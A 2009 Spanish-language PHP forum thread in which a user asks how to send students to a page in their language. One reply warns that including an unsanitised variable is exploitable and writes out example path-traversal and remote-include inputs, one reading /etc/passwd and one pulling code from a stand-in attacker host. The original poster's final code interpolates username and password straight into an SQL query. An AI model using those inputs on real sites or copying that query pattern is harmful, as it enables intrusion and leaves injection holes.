Autor Tema: ayuda con pagina en php  (Leído 5681 veces)

0 Usuarios y 1 Visitante están viendo este tema.

caix

  • Las rosas son #ff0000 las violetas son #0000ff
  • *
  • Mensajes: 102
  • Liked: 0
ayuda con pagina en php
« : abril 06, 2009, 02:42:06 pm »
Hola que tal ok pues tengo una pagina es un centro de idiomas  que por medio de una matricula ingresan a un contenido esclusivos lo que intento hacer es que por medio de esa matricula entren a la pagina de su idioma en donde estan escritos.
es decir usuario:leo   matricula:00001 idioma=frances  esa seria mi bd pero como puedo ponerlo en php para que el usuario "leo" entre a la pagina en frances?? alguna ayuda.
"piensa como piensan los sabios mas habla como habla la gente normal"

rocaanvil

  • ***
  • Mensajes: 274
  • Liked: 0
    • http://rocaanvil.wordpress.com
Re: ayuda con pagina en php
« Respuesta #1 : abril 08, 2009, 02:46:02 pm »
despues de realizar la autenticacion en tu portal, verifica el campo idioma de dicho usuario y en base a eso, redirige o cambia el idioma..

saludos, roca.
Si te gustan mis alas.. porque te empeñas en cortarlas??

Jorge L Lopez Yanez

  • **
  • Mensajes: 64
  • Liked: 0
Re: ayuda con pagina en php
« Respuesta #2 : mayo 11, 2009, 04:33:54 pm »
Hola que tal ok pues tengo una pagina es un centro de idiomas  que por medio de una matricula ingresan a un contenido esclusivos lo que intento hacer es que por medio de esa matricula entren a la pagina de su idioma en donde estan escritos.
es decir usuario:leo   matricula:00001 idioma=frances  esa seria mi bd pero como puedo ponerlo en php para que el usuario "leo" entre a la pagina en frances?? alguna ayuda.

un if a la variable idioma...

despues un header("Location: ". $idioma.".html");

Saludos

pulketo

  • ***
  • Mensajes: 289
  • Liked: 0
  • viviendo la vida...
Re: ayuda con pagina en php
« Respuesta #3 : junio 07, 2009, 01:42:22 am »
mas bien sería tener todos los textos en un archivo aparte y leerlo de acuerdo al idioma que quieras.


< ?
//index.php
$idioma=leer de base de datos que idioma es
include "$idioma".".php"
echo $hola;
?>


< ?
//espanol.php
$hola="Hola";
?>


< ?
//ingles.php
$hola="Hello";
?>
« Última Modificación: junio 07, 2009, 01:57:00 am por hkm »
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GE d-(++$) s:+ a C++ UL++ L+++ P W+++ !N w--- M-- !PS !t !5 e++ h! r+ y++
------END GEEK CODE BLOCK------

Jorge L Lopez Yanez

  • **
  • Mensajes: 64
  • Liked: 0
Re: ayuda con pagina en php
« Respuesta #4 : junio 07, 2009, 08:42:43 am »
mas bien sería tener todos los textos en un archivo aparte y leerlo de acuerdo al idioma que quieras.


< ?
//index.php
$idioma=leer de base de datos que idioma es
include "$idioma".".php"
echo $hola;
?>


< ?
//espanol.php
$hola="Hola";
?>


< ?
//ingles.php
$hola="Hello";
?>


Me encantan las personas que aprenden php de libors de USERS. haha, sin ofender bro..

pero ve.

index.php?idioma=../../../etc/passwd?
include "../../../etc/passwd?".".php"

index.php?idioma=http://attacker/virus.php?
include "http://atacker/virus.php?.php"

El peor error al programar php es incluir variables sin sanitizar.

juca

  • JUCA
  • ***
  • Mensajes: 76
  • Liked: 1
  • www.hackeruna.com
    • hackeruna :: Seguridad Informática
Re: ayuda con pagina en php
« Respuesta #5 : junio 08, 2009, 12:53:17 am »
No creo que sea un error el trabajar con includes mas bien pienso que es de mucha utilidad para no repetir codigo ademas de que te brinda muchas ventajas para agregar funcionalidad en el codigo.

Por ejemplo hakim.ws en su index utiliza un include al foro de la siguiente forma.

Código: [Seleccionar]
include("https://www.underground.org.mx/SSI.php?ssi_function=recentPosts");

Lo que si hay que utilizar una programacion a la defensiva para  evitar inconvenientes con posibles ataques.

Saludos
JUCA

Jorge L Lopez Yanez

  • **
  • Mensajes: 64
  • Liked: 0
Re: ayuda con pagina en php
« Respuesta #6 : junio 09, 2009, 08:37:25 am »
Nunca d
No creo que sea un error el trabajar con includes mas bien pienso que es de mucha utilidad para no repetir codigo ademas de que te brinda muchas ventajas para agregar funcionalidad en el codigo.

Por ejemplo hakim.ws en su index utiliza un include al foro de la siguiente forma.

Código: [Seleccionar]
include("https://www.underground.org.mx/SSI.php?ssi_function=recentPosts");

Lo que si hay que utilizar una programacion a la defensiva para  evitar inconvenientes con posibles ataques.

Saludos
JUCA

Nunca dije que fuera un error utilizar includes.. Lo que dije fue, y cito:
"El peor error al programar php es incluir variables sin sanitizar."

Por supuestos que los includes son una herramienta magnifica. Pero uilizarlos sin santiizar las variables es un error garrafal. Dije lo de libros USERS porque hace no mucho tiempo hojee un libro de estos (se llamaba "proyectos en php"), de puro reojo logre ver decenas de bugs listos para explotar (entre ellos include($variable . ".php"); )

pulketo

  • ***
  • Mensajes: 289
  • Liked: 0
  • viviendo la vida...
Re: ayuda con pagina en php
« Respuesta #7 : junio 12, 2009, 04:49:57 pm »
Creo que todos vieron que era un ejemplo...

pero  tienes razon acerca de la sanitización, no mas no seas mamon con tus comentarios.

« Última Modificación: junio 12, 2009, 04:51:30 pm por pulketo »
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GE d-(++$) s:+ a C++ UL++ L+++ P W+++ !N w--- M-- !PS !t !5 e++ h! r+ y++
------END GEEK CODE BLOCK------

Jorge L Lopez Yanez

  • **
  • Mensajes: 64
  • Liked: 0
Re: ayuda con pagina en php
« Respuesta #8 : junio 13, 2009, 06:22:48 pm »
Puse sin ofender, haha. pero ok.

No hace falta una super rutina de sanitizacion, con
"./".$idioma.".php" hubiera bastado para remote includes.

caix

  • Las rosas son #ff0000 las violetas son #0000ff
  • *
  • Mensajes: 102
  • Liked: 0
Re: ayuda con pagina en php
« Respuesta #9 : agosto 18, 2009, 04:52:03 pm »
Pues de una recomendacion se convirtió en una discusión
miren pues después de darle vueltas llegue a algo optimo como lo ven
<?php
  session_start();
  session_register('user');
  $user=$Nom;
 
  //conexion a la base de datos
  include("conexion.php");
  $conex=Conectar();
  $consul="select idioma from usuarios where user='$Nom' AND psw='$Psw' ";
  $resul=mysql_query($consul,$conex);
  $NumUser=mysql_num_rows($resul);               //numero de renglones
  $NumCampos=mysql_num_fields($resul);            //numero de campos 
  $resul=mysql_query($consul,$conex);
  $idiomas=0;
 
  while($fila=mysql_fetch_array($resul)){
    if (($fila['idioma']==frances)){
    $idiomas=1;}
    elseif(($fila['idioma']==ingles)){
    $idiomas=2;}
    elseif(($fila['idioma']==italiano)){
    $idiomas=3;}
   elseif(($fila['idioma']==aleman)){
    $idiomas=4;}
  }

  if ($idiomas==1) {
     include ("frances.php");}
  elseif ($idiomas==2){
     include ("ingles.php"); }
  elseif ($idiomas==3){
     include ("italiano.php"); }
  elseif ($idiomas==4){
     include ("aleman.php"); }
  else
     include("denegado.php"); 
      
  CerraConexion($resul,$conex);
?>
"piensa como piensan los sabios mas habla como habla la gente normal"